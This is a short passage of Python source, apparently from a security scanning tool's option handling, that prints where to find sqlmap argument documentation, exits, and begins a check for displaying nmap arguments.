            "for more information about sqlmap arguments, see here '{}'...".format(
                SQLMAP_MAN_PAGE_URL
            )
        ))
        shutdown()

    if opt.showNmapArgs: